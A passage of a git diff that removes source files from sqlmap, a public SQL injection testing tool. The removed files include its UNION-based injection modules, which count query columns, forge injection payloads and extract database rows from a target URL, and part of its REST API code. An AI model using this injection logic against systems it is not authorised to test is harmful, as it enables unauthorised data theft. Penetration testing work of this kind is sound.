a/lib/techniques/union/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py deleted file mode 100644 index 2374d2d2..00000000 --- a/lib/techniques/union/test.py +++ /dev/null @@ -1,320 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import random -import re - -from lib.core.agent import agent -from lib.core.common import average -from lib.core.common import Backend -from lib.core.common import isNullValue -from lib.core.common import listToStrValue -from lib.core.common import popValue -from lib.core.common import pushValue -from lib.core.common import randomInt -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.common import removeReflectiveValues -from lib.core.common import singleTimeLogMessage -from lib.core.common import singleTimeWarnMessage -from lib.core.common import stdev -from lib.core.common import wasLastResponseDBMSError -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.dicts import FROM_DUMMY_TABLE -from lib.core.enums import PAYLOAD -from lib.core.settings import LIMITED_ROWS_TEST_NUMBER -from lib.core.settings import UNION_MIN_RESPONSE_CHARS -from lib.core.settings import UNION_STDEV_COEFF -from lib.core.settings import MIN_RATIO -from lib.core.settings import MAX_RATIO -from lib.core.settings import MIN_STATISTICAL_RANGE -from lib.core.settings import MIN_UNION_RESPONSES -from lib.core.settings import NULL -from lib.core.settings import ORDER_BY_STEP -from lib.core.unescaper import unescaper -from lib.request.comparison import comparison -from lib.request.connect import Connect as Request - -def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL): - """ - Finds number of columns affected by UNION based injection - """ - retVal = None - - def _orderByTechnique(): - def _orderByTest(cols): - query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix) - query = agent.suffixQuery(query, suffix=suffix, comment=comment) - payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - return not re.search(r"(warning|error|order by|failed)", page or "", re.I) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I) - - if _orderByTest(1) and not _orderByTest(randomInt()): - infoMsg = "ORDER BY technique seems to be usable. " - infoMsg += "This should reduce the time needed " - infoMsg += "to find the right number " - infoMsg += "of query columns. Automatically extending the " - infoMsg += "range for current UNION query injection technique test" - singleTimeLogMessage(infoMsg) - - lowCols, highCols = 1, ORDER_BY_STEP - found = None - while not found: - if _orderByTest(highCols): - lowCols = highCols - highCols += ORDER_BY_STEP - else: - while not found: - mid = highCols - (highCols - lowCols) / 2 - if _orderByTest(mid): - lowCols = mid - else: - highCols = mid - if (highCols - lowCols) < 2: - found = lowCols - - return found - - try: - pushValue(kb.errorIsNone) - items, ratios = [], [] - kb.errorIsNone = False - lowerCount, upperCount = conf.uColsStart, conf.uColsStop - - if lowerCount == 1: - found = kb.orderByColumns or _orderByTechnique() - if found: - kb.orderByColumns = found - infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "") - singleTimeLogMessage(infoMsg) - return found - - if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES: - upperCount = lowerCount + MIN_UNION_RESPONSES - - min_, max_ = MAX_RATIO, MIN_RATIO - pages = {} - - for count in xrange(lowerCount, upperCount + 1): - query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - if not isNullValue(kb.uChar): - pages[count] = page - ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO - ratios.append(ratio) - min_, max_ = min(min_, ratio), max(max_, ratio) - items.append((count, ratio)) - - if not isNullValue(kb.uChar): - for regex in (kb.uChar, r'>\s*%s\s*<' % kb.uChar): - contains = [(count, re.search(regex, page or "", re.IGNORECASE) is not None) for count, page in pages.items()] - if len(filter(lambda x: x[1], contains)) == 1: - retVal = filter(lambda x: x[1], contains)[0][0] - break - - if not retVal: - if min_ in ratios: - ratios.pop(ratios.index(min_)) - if max_ in ratios: - ratios.pop(ratios.index(max_)) - - minItem, maxItem = None, None - - for item in items: - if item[1] == min_: - minItem = item - elif item[1] == max_: - maxItem = item - - if all(map(lambda x: x == min_ and x != max_, ratios)): - retVal = maxItem[0] - - elif all(map(lambda x: x != min_ and x == max_, ratios)): - retVal = minItem[0] - - elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE: - deviation = stdev(ratios) - lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation - - if min_ < lower: - retVal = minItem[0] - - if max_ > upper: - if retVal is None or abs(max_ - upper) > abs(min_ - lower): - retVal = maxItem[0] - finally: - kb.errorIsNone = popValue() - - if retVal: - infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal - singleTimeLogMessage(infoMsg) - - return retVal - -def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL): - validPayload = None - vector = None - - positions = range(0, count) - - # Unbiased approach for searching appropriate usable column - random.shuffle(positions) - - for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS): - if vector: - break - - # For each column of the table (# of NULL) perform a request using - # the UNION ALL SELECT statement to test it the target URL is - # affected by an exploitable union SQL injection vulnerability - for position in positions: - # Prepare expression with delimiters - randQuery = randomStr(charCount) - phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop) - randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) - randQueryUnescaped = unescaper.escape(randQueryProcessed) - - # Forge the union SQL injection request - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - - # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ - removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ - payload, True) or "") - - if content and phrase in content: - validPayload = payload - kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1 - vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, False) - - if where == PAYLOAD.WHERE.ORIGINAL: - # Prepare expression with delimiters - randQuery2 = randomStr(charCount) - phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop) - randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) - randQueryUnescaped2 = unescaper.escape(randQueryProcessed2) - - # Confirm that it is a full union SQL injection - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - - # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "") - - if not all(_ in content for _ in (phrase, phrase2)): - vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True) - elif not kb.unionDuplicates: - fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) - - # Check for limited row output - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - - # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ - removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ - payload, True) or "") - if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER: - warnMsg = "output with limited number of rows detected. Switching to partial mode" - logger.warn(warnMsg) - vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True) - - unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError() - - if unionErrorCase and count > 1: - warnMsg = "combined UNION/error-based SQL injection case found on " - warnMsg += "column %d. sqlmap will try to find another " % (position + 1) - warnMsg += "column with better characteristics" - logger.warn(warnMsg) - else: - break - - return validPayload, vector - -def _unionConfirm(comment, place, parameter, prefix, suffix, count): - validPayload = None - vector = None - - # Confirm the union SQL injection and get the exact column - # position which can be used to extract data - validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count) - - # Assure that the above function found the exploitable full union - # SQL injection position - if not validPayload: - validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE) - - return validPayload, vector - -def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix): - """ - This method tests if the target URL is affected by an union - SQL injection vulnerability. The test is done up to 50 columns - on the target database table - """ - - validPayload = None - vector = None - - # In case that user explicitly stated number of columns affected - if conf.uColsStop == conf.uColsStart: - count = conf.uColsStart - else: - count = _findUnionCharCount(comment, place, parameter, value, prefix, suffix, PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE) - - if count: - validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count) - - if not all([validPayload, vector]) and not all([conf.uChar, conf.dbms]): - warnMsg = "if UNION based SQL injection is not detected, " - warnMsg += "please consider " - - if not conf.uChar and count > 1 and kb.uChar == NULL: - message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] " - test = readInput(message, default="Y") - if test[0] not in ("y", "Y"): - warnMsg += "usage of option '--union-char' " - warnMsg += "(e.g. '--union-char=1') " - else: - conf.uChar = kb.uChar = str(randomInt(2)) - validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count) - - if not conf.dbms: - if not conf.uChar: - warnMsg += "and/or try to force the " - else: - warnMsg += "forcing the " - warnMsg += "back-end DBMS (e.g. '--dbms=mysql') " - - if not all([validPayload, vector]) and not warnMsg.endswith("consider "): - singleTimeWarnMessage(warnMsg) - - return validPayload, vector - -def unionTest(comment, place, parameter, value, prefix, suffix): - """ - This method tests if the target URL is affected by an union - SQL injection vulnerability. The test is done up to 3*50 times - """ - - if conf.direct: - return - - kb.technique = PAYLOAD.TECHNIQUE.UNION - validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) - - if validPayload: - validPayload = agent.removePayloadDelimiters(validPayload) - - return validPayload, vector diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py deleted file mode 100644 index 381cd658..00000000 --- a/lib/techniques/union/use.py +++ /dev/null @@ -1,367 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re -import time - -from extra.safe2bin.safe2bin import safecharencode -from lib.core.agent import agent -from lib.core.bigarray import BigArray -from lib.core.common import arrayizeValue -from lib.core.common import Backend -from lib.core.common import calculateDeltaSeconds -from lib.core.common import clearConsoleLine -from lib.core.common import dataToStdout -from lib.core.common import extractRegexResult -from lib.core.common import flattenValue -from lib.core.common import getConsoleWidth -from lib.core.common import getPartRun -from lib.core.common import getUnicode -from lib.core.common import hashDBRetrieve -from lib.core.common import hashDBWrite -from lib.core.common import incrementCounter -from lib.core.common import initTechnique -from lib.core.common import isListLike -from lib.core.common import isNoneValue -from lib.core.common import isNumPosStrValue -from lib.core.common import listToStrValue -from lib.core.common import parseUnionPage -from lib.core.common import removeReflectiveValues -from lib.core.common import singleTimeDebugMessage -from lib.core.common import singleTimeWarnMessage -from lib.core.common import unArrayizeValue -from lib.core.common import wasLastResponseDBMSError -from lib.core.convert import htmlunescape -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.dicts import FROM_DUMMY_TABLE -from lib.core.enums import DBMS -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapDataException -from lib.core.exception import SqlmapSyntaxException -from lib.core.settings import MAX_BUFFERED_PARTIAL_UNION_LENGTH -from lib.core.settings import SQL_SCALAR_REGEX -from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT -from lib.core.threads import getCurrentThreadData -from lib.core.threads import runThreads -from lib.core.unescaper import unescaper -from lib.request.connect import Connect as Request -from lib.utils.progress import ProgressBar -from thirdparty.odict.odict import OrderedDict - -def _oneShotUnionUse(expression, unpack=True, limited=False): - retVal = hashDBRetrieve("%s%s" % (conf.hexConvert or False, expression), checkConf=True) # as UNION data is stored raw unconverted - - threadData = getCurrentThreadData() - threadData.resumed = retVal is not None - - if retVal is None: - # Prepare expression with delimiters - injExpression = unescaper.escape(agent.concatQuery(expression, unpack)) - - # Forge the UNION SQL injection request - vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector - kb.unionDuplicates = vector[7] - kb.forcePartialUnion = vector[8] - query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) - where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6] - payload = agent.payload(newValue=query, where=where) - - # Perform the request - page, headers = Request.queryPage(payload, content=True, raise404=False) - - incrementCounter(PAYLOAD.TECHNIQUE.UNION) - - # Parse the returned page to get the exact UNION-based - # SQL injection output - def _(regex): - return reduce(lambda x, y: x if x is not None else y, (\ - extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), \ - extractRegexResult(regex, removeReflectiveValues(listToStrValue(headers.headers \ - if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), \ - None) - - # Automatically patching last char trimming cases - if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""): - warnMsg = "automatically patching output having last char trimmed" - singleTimeWarnMessage(warnMsg) - page = page.replace(kb.chars.stop[:-1], kb.chars.stop) - - retVal = _("(?P%s.*%s)" % (kb.chars.start, kb.chars.stop)) - - if retVal is not None: - retVal = getUnicode(retVal, kb.pageEncoding) - - # Special case when DBMS is Microsoft SQL Server and error message is used as a result of UNION injection - if Backend.isDbms(DBMS.MSSQL) and wasLastResponseDBMSError(): - retVal = htmlunescape(retVal).replace("
    ", "\n") - - hashDBWrite("%s%s" % (conf.hexConvert or False, expression), retVal) - else: - trimmed = _("%s(?P.*?)<" % (kb.chars.start)) - - if trimmed: - warnMsg = "possible server trimmed output detected " - warnMsg += "(probably due to its length and/or content): " - warnMsg += safecharencode(trimmed) - logger.warn(warnMsg) - else: - vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector - kb.unionDuplicates = vector[7] - - return retVal - -def configUnion(char=None, columns=None): - def _configUnionChar(char): - if not isinstance(char, basestring): - return - - kb.uChar = char - - if conf.uChar is not None: - kb.uChar = char.replace("[CHAR]", conf.uChar if conf.uChar.isdigit() else "'%s'" % conf.uChar.strip("'")) - - def _configUnionCols(columns): - if not isinstance(columns, basestring): - return - - columns = columns.replace(" ", "") - if "-" in columns: - colsStart, colsStop = columns.split("-") - else: - colsStart, colsStop = columns, columns - - if not colsStart.isdigit() or not colsStop.isdigit(): - raise SqlmapSyntaxException("--union-cols must be a range of integers") - - conf.uColsStart, conf.uColsStop = int(colsStart), int(colsStop) - - if conf.uColsStart > conf.uColsStop: - errMsg = "--union-cols range has to be from lower to " - errMsg += "higher number of columns" - raise SqlmapSyntaxException(errMsg) - - _configUnionChar(char) - _configUnionCols(conf.uCols or columns) - -def unionUse(expression, unpack=True, dump=False): - """ - This function tests for an UNION SQL injection on the target - URL then call its subsidiary function to effectively perform an - UNION SQL injection on the affected URL - """ - - initTechnique(PAYLOAD.TECHNIQUE.UNION) - - abortedFlag = False - count = None - origExpr = expression - startLimit = 0 - stopLimit = None - value = None - - width = getConsoleWidth() - start = time.time() - - _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) - - # Set kb.partRun in case the engine is called from the API - kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None - - if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper(): - # Removed ORDER BY clause because UNION does not play well with it - expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) - debugMsg = "stripping ORDER BY clause from statement because " - debugMsg += "it does not play well with UNION query SQL injection" - singleTimeDebugMessage(debugMsg) - - # We have to check if the SQL query might return multiple entries - # if the technique is partial UNION query and in such case forge the - # SQL limiting the query output one entry at a time - # NOTE: we assume that only queries that get data from a table can - # return multiple entries - if (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ - kb.forcePartialUnion or \ - (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \ - " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ - not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \ - and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ - and not re.search(SQL_SCALAR_REGEX, expression, re.I): - expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) - - if limitCond: - # Count the number of SQL query entries output - countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) - - if " ORDER BY " in countedExpression.upper(): - _ = countedExpression.upper().rindex(" ORDER BY ") - countedExpression = countedExpression[:_] - - output = _oneShotUnionUse(countedExpression, unpack) - count = unArrayizeValue(parseUnionPage(output)) - - if isNumPosStrValue(count): - if isinstance(stopLimit, int) and stopLimit > 0: - stopLimit = min(int(count), int(stopLimit)) - else: - stopLimit = int(count) - - infoMsg = "the SQL query used returns " - infoMsg += "%d entries" % stopLimit - logger.info(infoMsg) - - elif count and (not isinstance(count, basestring) or not count.isdigit()): - warnMsg = "it was not possible to count the number " - warnMsg += "of entries for the SQL query provided. " - warnMsg += "sqlmap will assume that it returns only " - warnMsg += "one entry" - logger.warn(warnMsg) - - stopLimit = 1 - - elif (not count or int(count) == 0): - if not count: - warnMsg = "the SQL query provided does not " - warnMsg += "return any output" - logger.warn(warnMsg) - else: - value = [] # for empty tables - return value - - threadData = getCurrentThreadData() - - try: - threadData.shared.limits = iter(xrange(startLimit, stopLimit)) - except OverflowError: - errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) - errMsg += "with switch '--fresh-queries'" - raise SqlmapDataException(errMsg) - - numThreads = min(conf.threads, (stopLimit - startLimit)) - threadData.shared.value = BigArray() - threadData.shared.buffered = [] - threadData.shared.counter = 0 - threadData.shared.lastFlushed = startLimit - 1 - threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 - - if threadData.shared.showEta: - threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) - - if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: - kb.suppressResumeInfo = True - debugMsg = "suppressing possible resume console info because of " - debugMsg += "large number of rows. It might take too long" - logger.debug(debugMsg) - - try: - def unionThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - with kb.locks.limit: - try: - valueStart = time.time() - threadData.shared.counter += 1 - num = threadData.shared.limits.next() - except StopIteration: - break - - if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): - field = expressionFieldsList[0] - elif Backend.isDbms(DBMS.ORACLE): - field = expressionFieldsList - else: - field = None - - limitedExpr = agent.limitQuery(num, expression, field) - output = _oneShotUnionUse(limitedExpr, unpack, True) - - if not kb.threadContinue: - break - - if output: - with kb.locks.value: - if all(map(lambda _: _ in output, (kb.chars.start, kb.chars.stop))): - items = parseUnionPage(output) - - if threadData.shared.showEta: - threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) - if isListLike(items): - # in case that we requested N columns and we get M!=N then we have to filter a bit - if len(items) > 1 and len(expressionFieldsList) > 1: - items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] - items = [_ for _ in flattenValue(items)] - if len(items) > len(expressionFieldsList): - filtered = OrderedDict() - for item in items: - key = re.sub(r"[^A-Za-z0-9]", "", item).lower() - if key not in filtered or re.search(r"[^A-Za-z0-9]", item): - filtered[key] = item - items = filtered.values() - items = [items] - index = None - for index in xrange(len(threadData.shared.buffered)): - if threadData.shared.buffered[index][0] >= num: - break - threadData.shared.buffered.insert(index or 0, (num, items)) - else: - index = None - if threadData.shared.showEta: - threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) - for index in xrange(len(threadData.shared.buffered)): - if threadData.shared.buffered[index][0] >= num: - break - threadData.shared.buffered.insert(index or 0, (num, None)) - - items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) - - while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH): - threadData.shared.lastFlushed, _ = threadData.shared.buffered[0] - if not isNoneValue(_): - threadData.shared.value.extend(arrayizeValue(_)) - del threadData.shared.buffered[0] - - if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta: - status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(",".join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items)) - - if len(status) > width: - status = "%s..." % status[:width - 3] - - dataToStdout("%s\n" % status, True) - - runThreads(numThreads, unionThread) - - if conf.verbose == 1: - clearConsoleLine(True) - - except KeyboardInterrupt: - abortedFlag = True - - warnMsg = "user aborted during enumeration. sqlmap " - warnMsg += "will display partial output" - logger.warn(warnMsg) - - finally: - for _ in sorted(threadData.shared.buffered): - if not isNoneValue(_[1]): - threadData.shared.value.extend(arrayizeValue(_[1])) - value = threadData.shared.value - kb.suppressResumeInfo = False - - if not value and not abortedFlag: - output = _oneShotUnionUse(expression, unpack) - value = parseUnionPage(output) - - duration = calculateDeltaSeconds(start) - - if not kb.bruteMode: - debugMsg = "performed %d queries in %.2f seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], duration) - logger.debug(debugMsg) - - return value diff --git a/lib/utils/__init__.py b/lib/utils/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/utils/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/utils/api.py b/lib/utils/api.py deleted file mode 100644 index 6ccfbada..00000000 --- a/lib/utils/api.py +++ /dev/null @@ -1,815 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import logging -import os -import re -import shlex -import socket -import sqlite3 -import sys -import tempfile -import time -import urllib2 - -from lib.core.common import dataToStdout -from lib.core.common import getSafeExString -from lib.core.common import unArrayizeValue -from lib.core.convert import base64pickle -from lib.core.convert import hexencode -from lib.core.convert import dejsonize -from lib.core.convert import jsonize -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import paths -from lib.core.data import logger -from lib.core.datatype import AttribDict -from lib.core.defaults import _defaults -from lib.core.enums import CONTENT_STATUS -from lib.core.enums import PART_RUN_CONTENT_TYPES -from lib.core.exception import SqlmapConnectionException -from lib.core.log import LOGGER_HANDLER -from lib.core.optiondict import optDict -from lib.core.settings import RESTAPI_DEFAULT_ADAPTER -from lib.core.settings import IS_WIN -from lib.core.settings import RESTAPI_DEFAULT_ADDRESS -from lib.core.settings import RESTAPI_DEFAULT_PORT -from lib.core.subprocessng import Popen -from lib.parse.cmdline import cmdLineParser -from thirdparty.bottle.bottle import error as return_error -from thirdparty.bottle.bottle import get -from thirdparty.bottle.bottle import hook -from thirdparty.bottle.bottle import post -from thirdparty.bottle.bottle import request -from thirdparty.bottle.bottle import response -from thirdparty.bottle.bottle import run - - -# global settings -class DataStore(object): - admin_id = "" - current_db = None - tasks = dict() - - -# API objects -class Database(object): - filepath = None - - def __init__(self, database=None): - self.database = self.filepath if database is None else database - self.connection = None - self.cursor = None - - def connect(self, who="server"): - self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None) - self.cursor = self.connection.cursor() - logger.debug("REST-JSON API %s connected to IPC database" % who) - - def disconnect(self): - if self.cursor: - self.cursor.close() - - if self.connection: - self.connection.close() - - def commit(self): - self.connection.commit() - - def execute(self, statement, arguments=None): - while True: - try: - if arguments: - self.cursor.execute(statement, arguments) - else: - self.cursor.execute(statement) - except sqlite3.OperationalError, ex: - if not "locked" in getSafeExString(ex): - raise - else: - break - - if statement.lstrip().upper().startswith("SELECT"): - return self.cursor.fetchall() - - def init(self): - self.execute("CREATE TABLE logs(" - "id INTEGER PRIMARY KEY AUTOINCREMENT, " - "taskid INTEGER, time TEXT, " - "level TEXT, message TEXT" - ")") - - self.execute("CREATE TABLE data(" - "id INTEGER PRIMARY KEY AUTOINCREMENT, " - "taskid INTEGER, status INTEGER, " - "content_type INTEGER, value TEXT" - ")") - - self.execute("CREATE TABLE errors(" - "id INTEGER PRIMARY KEY AUTOINCREMENT, " - "taskid INTEGER, error TEXT" - ")") - - -class Task(object): - def __init__(self, taskid, remote_addr): - self.remote_addr = remote_addr - self.process = None - self.output_directory = None - self.options = None - self._original_options = None - self.initialize_options(taskid) - - def initialize_options(self, taskid): - datatype = {"boolean": False, "string": None, "integer": None, "float": None} - self.options = AttribDict() - - for _ in optDict: - for name, type_ in optDict[_].items(): - type_ = unArrayizeValue(type_) - self.options[name] = _defaults.get(name, datatype[type_]) - - # Let sqlmap engine knows it is getting called by the API, - # the task ID and the file path of the IPC database - self.options.api = True - self.options.taskid = taskid - self.options.database = Database.filepath - - # Enforce batch mode and disable coloring and ETA - self.options.batch = True - self.options.disableColoring = True - self.options.eta = False - - self._original_options = AttribDict(self.options) - - def set_option(self, option, value): - self.options[option] = value - - def get_option(self, option): - return self.options[option] - - def get_options(self): - return self.options - - def reset_options(self): - self.options = AttribDict(self._original_options) - - def engine_start(self): - if os.path.exists("sqlmap.py"): - self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)], shell=False, close_fds=not IS_WIN) - else: - self.process = Popen(["sqlmap", "--pickled-options", base64pickle(self.options)], shell=False, close_fds=not IS_WIN) - - def engine_stop(self): - if self.process: - self.process.terminate() - return self.process.wait() - else: - return None - - def engine_process(self): - return self.process - - def engine_kill(self): - if self.process: - try: - self.process.kill() - return self.process.wait() - except: - pass - return None - - def engine_get_id(self): - if self.process: - return self.process.pid - else: - return None - - def engine_get_returncode(self): - if self.process: - self.process.poll() - return self.process.returncode - else: - return None - - def engine_has_terminated(self): - return isinstance(self.engine_get_returncode(), int) - - -# Wrapper functions for sqlmap engine -class StdDbOut(object): - def __init__(self, taskid, messagetype="stdout"): - # Overwrite system standard output and standard error to write - # to an IPC database - self.messagetype = messagetype - self.taskid = taskid - - if self.messagetype == "stdout": - sys.stdout = self - else: - sys.stderr = self - - def write(self, value, status=CONTENT_STATUS.IN_PROGRESS, content_type=None): - if self.messagetype == "stdout": - if content_type is None: - if kb.partRun is not None: - content_type = PART_RUN_CONTENT_TYPES.get(kb.partRun) - else: - # Ignore all non-relevant messages - return - - output = conf.database_cursor.execute( - "SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?", - (self.taskid, content_type)) - - # Delete partial output from IPC database if we have got a complete output - if status == CONTENT_STATUS.COMPLETE: - if len(output) > 0: - for index in xrange(len(output)): - conf.database_cursor.execute("DELETE FROM data WHERE id = ?", - (output[index][0],)) - - conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", - (self.taskid, status, content_type, jsonize(value))) - if kb.partRun: - kb.partRun = None - - elif status == CONTENT_STATUS.IN_PROGRESS: - if len(output) == 0: - conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", - (self.taskid, status, content_type, - jsonize(value))) - else: - new_value = "%s%s" % (dejsonize(output[0][2]), value) - conf.database_cursor.execute("UPDATE data SET value = ? WHERE id = ?", - (jsonize(new_value), output[0][0])) - else: - conf.database_cursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)", - (self.taskid, str(value) if value else "")) - - def flush(self): - pass - - def close(self): - pass - - def seek(self): - pass - - -class LogRecorder(logging.StreamHandler): - def emit(self, record): - """ - Record emitted events to IPC database for asynchronous I/O - communication with the parent process - """ - conf.database_cursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", - (conf.taskid, time.strftime("%X"), record.levelname, - record.msg % record.args if record.args else record.msg)) - - -def setRestAPILog(): - if hasattr(conf, "api"): - try: - conf.database_cursor = Database(conf.database) - conf.database_cursor.connect("client") - except sqlite3.OperationalError, ex: - raise SqlmapConnectionException, "%s ('%s')" % (ex, conf.database) - - # Set a logging handler that writes log messages to a IPC database - logger.removeHandler(LOGGER_HANDLER) - LOGGER_RECORDER = LogRecorder() - logger.addHandler(LOGGER_RECORDER) - - -# Generic functions -def is_admin(taskid): - return DataStore.admin_id == taskid - - -@hook("after_request") -def security_headers(json_header=True): - """ - Set some headers across all HTTP responses - """ - response.headers["Server"] = "Server" - response.headers["X-Content-Type-Options"] = "nosniff" - response.headers["X-Frame-Options"] = "DENY" - response.headers["X-XSS-Protection"] = "1; mode=block" - response.headers["Pragma"] = "no-cache" - 